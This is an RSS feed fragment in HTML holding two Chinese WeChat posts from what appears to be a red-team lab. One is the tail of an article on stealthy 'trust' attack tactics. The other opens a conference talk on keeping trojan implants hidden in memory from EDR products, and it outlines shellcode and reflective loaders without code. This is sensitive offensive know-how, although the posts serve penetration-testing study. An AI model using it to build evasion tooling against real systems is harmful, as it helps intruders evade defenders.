Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 20px;font-weight: bold;">目标获取</span></span><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 20px;font-weight: bold;">   </span></span><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"> </span></h1><p style="text-align: left;margin-left: 21.25pt;text-indent: -21.25pt;line-height: 1.6em;margin-bottom: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">1. </span><span style="font:7.0pt Times New Roman;"></span><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">业务理解，数据输出位</span></p><p style="text-align: left;margin-left: 42pt;text-indent: -21pt;line-height: 1.6em;margin-bottom: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">(1)</span><span style="font:7.0pt Times New Roman;"></span><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">大部分业务系统，不只有一种形态的结果输出</span></p><p style="text-align: left;margin-left: 42pt;text-indent: -21pt;line-height: 1.6em;margin-bottom: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">(2)</span><span style="font:7.0pt Times New Roman;"></span><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">随着对抗升级，攻击方对行业的理解也在提升：金融、能源、运营商...</span></p><p style="text-align: left;margin-left: 63pt;text-indent: -21pt;line-height: 1.6em;margin-bottom: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">①</span><span style="font:7.0pt Times New Roman;"></span><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">理解业务，少走弯路；减少扫描带来的熵增</span></p><p style="text-align: left;margin-left: 21.25pt;text-indent: -21.25pt;line-height: 1.6em;margin-bottom: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">2. </span><span style="font:7.0pt Times New Roman;"></span><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">巧用系统内部的可信功能（客服、帮助文档、提bug ...）</span></p><p style="text-align: left;margin-left: 21.25pt;text-indent: -21.25pt;line-height: 1.6em;margin-bottom: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">3. </span><span style="font:7.0pt Times New Roman;"></span><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">优先认证攻击再打漏洞</span></p><p style="text-align: left;margin-left: 21.25pt;text-indent: -21.25pt;line-height: 1.6em;margin-bottom: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">4. </span><span style="font:7.0pt Times New Roman;"></span><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">回归渗透本质</span></p><p style="text-align: left;margin-left: 42pt;text-indent: -21pt;line-height: 1.6em;margin-bottom: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">(1)</span><span style="font:7.0pt Times New Roman;"></span><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">阈值对抗、信息组合 ...</span></p><p style="text-align: left;margin-left: 42pt;text-indent: -21pt;line-height: 1.6em;margin-bottom: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">(2)</span><span style="font:7.0pt Times New Roman;"></span><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">时间够的前提，慢就是快</span></p><p style="text-align: left;line-height: 1.6em;margin-bottom: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">          </span><o:p><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"> </span></o:p></p><p style="text-align: left;line-height: 1.6em;margin-bottom: 0px;"><o:p><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"><br/></span></o:p></p><hr style="border-style: solid;border-width: 1px 0 0;border-color: rgba(0,0,0,0.1);-webkit-transform-origin: 0 0;-webkit-transform: scale(1, 0.5);transform-origin: 0 0;transform: scale(1, 0.5);"/><p style="text-align: left;line-height: 1.6em;margin-bottom: 0px;"><o:p><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"><br/></span></o:p></p><h1 style="line-height: 1.6em;margin-bottom: 0px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 20px;font-weight: bold;">9.</span></span><span style="font:7.0pt Times New Roman;"></span><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 20px;font-weight: bold;">归纳总结</span></span><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 20px;font-weight: bold;">    </span></span></h1><p style="text-indent: 21pt;direction: ltr;line-height: 1.6em;margin-bottom: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">实战中的无感一种是有痕迹但防守方不知道，另外一种攻击方的确留下很少的痕迹，甚至没有痕迹。但无论哪种，随着发展，攻击手法肯定越来复杂、越来越高级。</span></p><p style="text-indent: 21pt;direction: ltr;line-height: 1.6em;margin-bottom: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">本文通过借助对目前防守方鉴黑和鉴白模式的思考，引出了红队各个模块的“白”能力——<span textstyle="" style="color: rgb(255, 0, 0);">进击的“白”巨人</span><span textstyle="" style="color: rgb(0, 0, 0);">（</span><span textstyle="" style="color: rgb(0, 0, 0);font-style: italic;">当然文中的这个白是自定义的， 有的也不一定白，甚至也是有痕迹的，但的确是一个思考方式和进攻模式</span><span textstyle="" style="color: rgb(0, 0, 0);">）</span>；定义了三个阶段的进攻模式：饱和攻击、对抗攻击、<span textstyle="" style="color: rgb(255, 0, 0);font-weight: bold;">信任攻击</span>，也不一定全面，给各位大佬当个参考。</span></p><p style="line-height: 1.6em;margin-bottom: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">          </span><o:p><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"> </span></o:p></p><p style="text-align: left;line-height: 1.6em;margin-bottom: 0px;"><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">          </span><o:p><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"> </span></o:p><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;">    </span><o:page></o:page></p><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="2247484194">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=fa07b4b2&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzU0NTI4MDQwMQ%3D%3D%26mid%3D2247484194%26idx%3D1%26sn%3Dcb404b0fcfa2490d458d482fa704e98a%26subscene%3D0">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Sun, 12 Jan 2025 21:21:00 +0800</pubDate>
    </item>
    <item>
      <title>终端对抗防御逃逸-内存免杀</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzU0NTI4MDQwMQ==&amp;mid=2247484184&amp;idx=1&amp;sn=101b31368a5a3b3f2d1f3c1b68ecb628</link>
      <description>内存检测逃逸必杀技~</description>
      <content:encoded><![CDATA[<p>
原创 <span>hunter</span> <span>2024-11-13 22:00</span> <span style="display: inline-block;">北京</span>
</p>

<p>内存检测逃逸必杀技~</p>
<p></p>



<p>
<img src="https://wechat2rss.xlab.app/img-proxy/?k=dd041445&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FgS0DP6tuCtI5HicgrSfwj6kTH64hjLXkF9RdEXPZ477IBmH9NoS0Ga5Ra8IrZGnGpfm11A6xjNw1PE66rYOFDTw%2F0%3Fwx_fmt%3Djpeg"/>
</p>


<p style="line-height: 1.5em;margin-bottom: 16px;"><span style="font-family: 宋体;font-variant: normal;text-transform: none;color: rgb(255, 0, 0);">Author: hunter@深蓝攻防实验室</span></p><p style="line-height: 1.5em;margin-bottom: 16px;"><span style="color:#ff0000;font-family:宋体;"><span style="color: rgb(0, 0, 0);">本文为ADConf 原创议题</span></span></p><section><section style="display: inline-block;"><img class="rich_pages wxw-img" data-ratio="0.75" data-w="1080" data-type="jpg" src="https://wechat2rss.xlab.app/img-proxy/?k=649dd886&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FgS0DP6tuCtI5HicgrSfwj6kTH64hjLXkF1NUHa2CEgdibHqQzS47hpjwicFpcMjxSAdKEQPRE0m27BmDbmricaSNDA%2F640%3Fwx_fmt%3Djpeg"/></section></section><p style="line-height: 1.5em;margin-bottom: 16px;"><span style="font-size: 24px;"><strong><span style="font-size: 24px;font-family: 宋体;font-variant: normal;text-transform: none;">关于终端对抗</span></strong></span></p><p style="line-height: 1.5em;margin-bottom: 16px;"><span style="mso-bookmark:关于终端对抗;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;mso-fareast-font-family:Cambria;font-variant:normal;text-transform:none;"><img class="rich_pages wxw-img" data-backh="122" data-backw="560" data-imgfileid="100000502" data-ratio="0.21851851851851853" style="width: 100%;height: auto !important;" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=c6ccfb8e&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FgS0DP6tuCtI5HicgrSfwj6kTH64hjLXkFuWJA38SQMZDpo3d1OlqG3oicMDRCbYglUicbQMkb1aPvvtNQ7JMx1ibow%2F640%3Fwx_fmt%3Dpng"/></span></span></p><hr style="border-style: solid;border-width: 1px 0 0;border-color: rgba(0,0,0,0.1);-webkit-transform-origin: 0 0;-webkit-transform: scale(1, 0.5);transform-origin: 0 0;transform: scale(1, 0.5);"/><p style="line-height: 1.5em;margin-bottom: 16px;"><span style="mso-bookmark:关于终端对抗;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;mso-fareast-font-family:Cambria;font-variant:normal;text-transform:none;"></span></span></p><p style="line-height: 1.5em;margin-bottom: 16px;"><span style="font-size: 24px;"><strong><span style="font-size: 24px;font-family: Calibri;font-variant: normal;text-transform: none;">内存免杀的意义</span></strong></span></p><p style="line-height: 1.5em;margin-bottom: 16px;"><span style="mso-bookmark:内存免杀的意义;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;mso-fareast-font-family:Cambria;font-variant:normal;text-transform:none;">Q：在当前BYOVD技术已经成熟且武器化且EDR检测能力也逐渐完善的环境下，为什么还要研究内存检测逃逸相关的技术？</span></span></p><p style="margin-top: 9pt;text-align: left;margin-left: 0pt;text-indent: 0pt;font-size: 12pt;font-family: Cambria;font-weight: normal;line-height: 1.5em;margin-bottom: 16px;"><span style="mso-bookmark:内存免杀的意义;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;mso-fareast-font-family:Cambria;font-variant:normal;text-transform:none;">A：首先要明确：高压环境下的EDR致盲目的不再是“一键卸载安全卫士/电脑管家”，而是要在企业级EDR控制端没有察觉的情况下致盲终端Agent的检测。</span></span></p><p style="margin-top: 9pt;text-align: left;margin-left: 0pt;text-indent: 0pt;font-size: 12pt;font-family: Cambria;font-weight: normal;line-height: 1.5em;margin-bottom: 16px;"><span style="mso-bookmark:内存免杀的意义;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;font-variant:normal;text-transform:none;">然而有些场景是不能完全依赖BYOVD的，</span></span><span style="mso-bookmark:内存免杀的意义;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;font-variant:normal;text-transform:none;font-weight:bold;mso-bidi-font-weight:bold;font-style:italic;mso-bidi-font-style:italic;">我们的木马要被迫和完全体EDR共存</span></span><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: var(--articleFontsize);letter-spacing: 0.034em;text-align: justify;"></span></p><ol class="list-paddingleft-1" style="list-style-type: decimal;"><li><p>加载驱动的黑白名单。</p></li><li><p>EDR的R3/R0组件中有类暗桩的存在。</p></li><li><p>与EDR控制端通信的模块直接做在了R0里面，卸载驱动等同于直接切断通信。</p></li><li><p>部分场景下，根本没有系统的高权限且无法提权。</p></li><li><p>机器重启后，被致盲的EDR会恢复正常，权限维持的木马必须有一定存活能力。</p></li><li><p>......</p></li></ol><p><br/></p><p style="line-height: 1.5em;margin-bottom: 16px;"><span style="mso-bookmark:内存免杀的意义;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;font-variant:normal;text-transform:none;">木马“内存免杀”需要聚焦的两个阶段：</span></span><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: var(--articleFontsize);letter-spacing: 0.034em;"></span></p><ol class="list-paddingleft-1" style="list-style-type: decimal;"><li><p>Loader载入Shellcode并释放植入体的整个过程。</p></li><li><p>植入体成功释放，核心代码线程在“运行——休眠”的过程中长期与EDR共存。</p><p><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: var(--articleFontsize);letter-spacing: 0.034em;"></span></p></li></ol><hr style="border-style: solid;border-width: 1px 0 0;border-color: rgba(0,0,0,0.1);-webkit-transform-origin: 0 0;-webkit-transform: scale(1, 0.5);transform-origin: 0 0;transform: scale(1, 0.5);"/><p style="margin-left: 36pt;text-indent: -24pt;line-height: 1.5em;margin-bottom: 16px;"><span style="mso-bookmark:内存免杀的意义;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;font-variant:normal;text-transform:none;"></span></span></p><p style="line-height: 1.5em;margin-bottom: 16px;"><strong><span style="font-family: Calibri;font-variant: normal;text-transform: none;font-size: 24px;">Loader原理</span></strong><span style="font-family: Calibri;font-variant: normal;text-transform: none;font-size: 24px;"></span></p><ol class="list-paddingleft-1" style="list-style-type: decimal;"><li><p>Loader外壳从某个地方（云端/本地/PE资源节等...）获取Shellcode（PIE代码），申请一段内存，将Shellcode写入并执行。Shellcode本体是通过转换工具（PengCode/donut等）将原C2客户端的PE转换成一个反射加载器。</p><p><img class="rich_pages wxw-img" data-backh="248" data-backw="212" data-imgfileid="100000535" data-ratio="1.169811320754717" style="font-family: Cambria;letter-spacing: 0.578px;text-indent: -32px;width: 530px;height: auto !important;" data-type="png" data-w="159" src="https://wechat2rss.xlab.app/img-proxy/?k=5f8800a8&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FgS0DP6tuCtI5HicgrSfwj6kTH64hjLXkFCgungDuPhb4EWtG996EYzqtWu5kDu3mXL5hRxa2jMmhQ3S5YDnCamQ%2F640%3Fwx_fmt%3Dpng"/><br/></p></li><li><p>Shellcode执行内置的反射加载器，重新申请内存空间，将打包的PE（植入体）释放到新内存区域。反射加载器会负责解析打包的PE文件头信息，完成重建导入表、重定位等工作。</p><p><img class="rich_pages wxw-img" data-backh="281" data-backw="320" data-imgfileid="100000534" data-ratio="0.8791666666666667" style="font-family: Cambria;letter-spacing: 0.578px;text-indent: -32px;width: 530px;height: auto !important;" data-type="png" data-w="240" src="https://wechat2rss.xlab.app/img-proxy/?k=c0569414&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FgS0DP6tuCtI5HicgrSfwj6kTH64hjLXkF5iaqvh6Fs27FoGdrmZibqKGF6Xen8QMTYV8H3LuRiaxrGR72fwicbsrJ9A%2F640%3Fwx_fmt%3Dpng"/><br/></p></li><li><p><span style="letter-spacing: 0.578px;text-indent: -32px;"><span style="font-family: Cambria;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;">通过反射加载的dll导出表找到木马植入体，执行。木马植入体进入执行——休眠周期。</span></span><span style="letter-spacing: 0.578px;text-indent: -32px;">    </span></p></li></ol><p style="margin-left: 36pt;text-indent: -24pt;line-height: 1.5em;margin-bottom: 16px;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;mso-fareast-font-family:Cambria;font-variant:normal;text-transform:none;"> <span style="font:7.0pt Times New Roman;"></span></span><span style="mso-bookmark:loader原理;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;mso-fareast-font-family:Cambria;font-variant:normal;text-transform:none;"><img class="rich_pages wxw-img" data-backh="276" data-backw="300" data-imgfileid="100000500" data-ratio="0.92" style="width: 100%;height: auto !important;" data-type="png" data-w="225" src="https://wechat2rss.xlab.app/img-proxy/?k=50d1406c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FgS0DP6tuCtI5HicgrSfwj6kTH64hjLXkFLmBcbjraw70myso6KQQh3kdFCuOcgxCvnNtqWZiasjMOzCREn0oyjiaQ%2F640%3Fwx_fmt%3Dpng"/></span></span></p><p style="margin-left: 36pt;text-indent: -24pt;line-height: 1.5em;margin-bottom: 16px;"><br/></p><p style="line-height: 1.5em;margin-bottom: 16px;"><span style="mso-bookmark:loader原理;"><span style="font-family:Cambria;mso-ascii-font-family:Cambria;mso-fareast-font-family:Cambria;font-variant:normal;text-transform:none;"> </span></span></p><hr style="border-style: solid;border-width: 1px 0 0;border-color: rgba(0,0,0,0.1);-webkit-transform-origin: 0 0;-webkit-transform: scale(1, 0.5);transform-origin: 0 0;transform: scale(1, 0.5);"/><p style="line-height: 1.5em;margin-bottom: 16px;"><span style="mso-bookmark:loader原理;"><span 